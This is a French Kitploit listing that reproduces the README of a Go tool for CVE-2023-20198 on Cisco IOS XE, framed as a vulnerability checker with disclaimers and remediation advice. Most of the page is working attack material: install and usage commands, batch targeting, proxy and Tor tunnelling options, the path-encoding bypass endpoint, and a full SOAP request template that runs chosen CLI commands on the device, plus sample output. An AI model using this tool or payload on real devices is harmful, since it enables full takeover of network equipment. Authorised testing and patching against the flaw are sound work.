Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cisco-cve-2023-20198-checker — Scanneur de vulnérabilités basé sur Go pour la détection de CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML (WSMA) pour l'exécution de code à distance avec analyse par lots et génération de rapports HTML. | Kitploit
Outils/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
Scanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité RéseauTests d'IntrusionCommandement et Contrôle
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Scanneur de vulnérabilités basé sur Go pour la détection de CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML (WSMA) pour l'exécution de code à distance avec analyse par lots et génération de rapports HTML.

Voir le dépôt
3il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cisco CVE-2023-20198 Vérificateur

Go Version License Platform

Un scanner de vulnérabilités professionnel pour détecter CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML vulnérables (WSMA). Conçu pour les évaluations de sécurité autorisées et l'audit réseau.

⚠️ Avertissement légal

POUR TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT

Cet outil est destiné exclusivement à :

  • L'analyse de vulnérabilités autorisée
  • Les audits de sécurité avec consentement écrit explicite
  • Les évaluations de sécurité réseau
  • Des fins éducatives dans des environnements de laboratoire contrôlés
  • Les tests de conformité et de pénétration

L'accès non autorisé aux systèmes informatiques est ILLÉGAL. Assurez-vous toujours d'avoir l'autorisation appropriée avant de tester tout système.


🚀 Démarrage rapide

Installation

Avec go install (Recommandé)

root@kitploit:~
go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

Le binaire sera installé dans votre répertoire $GOPATH/bin (généralement ~/go/bin).

Installation manuelle

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# Compiler
go build -o cisco-cve-2023-20198-checker

# Installer (optionnel)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

Utilisation de base

root@kitploit:~
# Vérifier une seule cible
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Vérifier plusieurs cibles
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# Générer un rapport HTML
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 Fonctionnalités

  • ✅ Détection de vulnérabilités - Teste CVE-2023-20198 (WSMA RCE)
  • ✅ Analyse cible unique et par lot
  • ✅ Prise en charge des ports personnalisés (défaut : 443)
  • ✅ Exécution de commandes via SOAP/XML
  • ✅ Génération de rapports HTML professionnels
  • ✅ Zéro dépendance externe
  • ✅ Multi-plateforme (Linux, macOS, Windows)
  • ✅ Option d'ignorer les certificats SSL/TLS
  • ✅ Délais d'attente configurables
  • ✅ Prise en charge des proxys (HTTP, HTTPS, SOCKS5)
  • ✅ Proxys authentifiés
  • ✅ Prise en charge des variables d'environnement (HTTP_PROXY, HTTPS_PROXY)

🌐 Prise en charge des proxys

Parfait pour les environnements d'entreprise ! Prend en charge :

  • Proxys HTTP/HTTPS
  • Proxys SOCKS5 (tunnels SSH, Tor)
  • Proxys authentifiés
  • Variables d'environnement
root@kitploit:~
# Proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Variable d'environnement
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

Voir PROXY_GUIDE.md pour une configuration détaillée des proxys.


💻 Options de ligne de commande

OptionTypeDéfautDescription
-targetstring-IP/nom d'hôte de la cible unique
-targets-filestring-Fichier contenant les cibles (une par ligne)
-portint443Port HTTPS/SOAP
-usernamestringadminNom d'utilisateur SOAP
-passwordstring-Requis. Mot de passe SOAP
-commandstringuname -aCommande à exécuter
-htmlboolfalseGénérer un rapport HTML
-timeoutint10Délai d'attente de la requête (secondes)
-skip-verifybooltrueIgnorer la vérification SSL
-proxystring-URL du proxy (http://, https://, socks5://)

📖 Exemples d'utilisation

Test d'une cible unique

root@kitploit:~
# Vérification de vulnérabilité de base
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Port personnalisé
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# Exécuter une commande spécifique
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Générer un rapport
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

Tests par lot

root@kitploit:~
# Créer un fichier de cibles
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# Tester toutes les cibles
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# Lot avec rapport HTML
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

Commandes avancées

root@kitploit:~
# Énumération réseau
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# Détection de version
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Via proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# Via proxy SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Proxy authentifié
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 À propos de CVE-2023-20198

Détails de la vulnérabilité

Identifiant CVE : CVE-2023-20198
Score CVSS : 10.0 (Critique)
Type : Exécution de code à distance (RCE)
Affecté : Interface Web Cisco IOS XE (WSMA)

Détails techniques

  • Point d'accès : /%2577ebui_wsma_https (contournement d'encodage de chemin)
  • Protocole : SOAP 1.1 sur HTTPS
  • Authentification : WS-Security UsernameToken (informations d'identification valides requises)
  • Espace de noms : urn:cisco:wsma-exec
  • Impact : Compromission totale de l'appareil avec des identifiants valides

Structure de la requête SOAP

root@kitploit:~
<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ Remédiation

Pour les administrateurs système

Si vos appareils sont vulnérables :

1. Désactiver WSMA (si non requis)

root@kitploit:~
no ip http server
no ip http secure-server

2. Restreindre l'accès avec des ACL

root@kitploit:~
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. Mettre à jour le firmware - Appliquer les derniers correctifs de sécurité Cisco

4. Activer une authentification forte

root@kitploit:~
aaa new-model
aaa authentication login default group tacacs+ local

5. Surveiller les journaux - Rechercher toute activité SOAP/HTTP suspecte


🏗️ Compilation depuis les sources

Prérequis

  • Go 1.21 ou version ultérieure

Compilation

root@kitploit:~
# Compilation standard
go build -o cisco-cve-2023-20198-checker

# Optimisé (binaire plus petit)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# Compilation croisée pour différentes plateformes
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 Exemples de sortie

Sortie terminal

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     Cisco SOAP/XML Security Checker                       ║
║     Educational & Authorized Security Assessment Only     ║
╚═══════════════════════════════════════════════════════════╝

[*] Command: show version
[*] Port: 443
[*] Timeout: 10 seconds

[1/1] Testing target: 192.168.1.100:443
[*] Sending SOAP request...
[+] Response received (Status: 200)
[+] Success!

╔═══════════════════════════════════════════════════════════╗
║                    BATCH RESULTS                          ║
╚═══════════════════════════════════════════════════════════╝

[✓] 192.168.1.100:443 - SUCCESS
Cisco IOS XE Software, Version 16.09.04...

╔═══════════════════════════════════════════════════════════╗
║                      SUMMARY                              ║
╚═══════════════════════════════════════════════════════════╝
Total Targets: 1
Successful: 1
Failed: 0

Rapport HTML

Rapport d'évaluation de sécurité professionnel avec :

  • Tableau de bord statistique
  • Configuration détaillée
  • Sorties de commandes (style terminal)
  • Métadonnées techniques
  • Mentions légales

🤝 Contribuer

Les contributions sont les bienvenues ! Veuillez :

  1. Forker le dépôt
  2. Créer une branche de fonctionnalité
  3. Effectuer vos modifications
  4. Soumettre une pull request

📝 Licence

Licence MIT - voir le fichier LICENSE


🔗 Références

  • Avis de sécurité Cisco
  • Détails de CVE-2023-20198
  • Sécurité des API OWASP

⚖️ Divulgation responsable

Cet outil est destiné uniquement à l'analyse de vulnérabilités autorisée. Les auteurs ne sont pas responsables d'une mauvaise utilisation. Obtenez toujours une autorisation écrite avant de tester des systèmes dont vous n'êtes pas propriétaire.


Fait pour la communauté de la sécurité 🛡️

Télécharger l’outil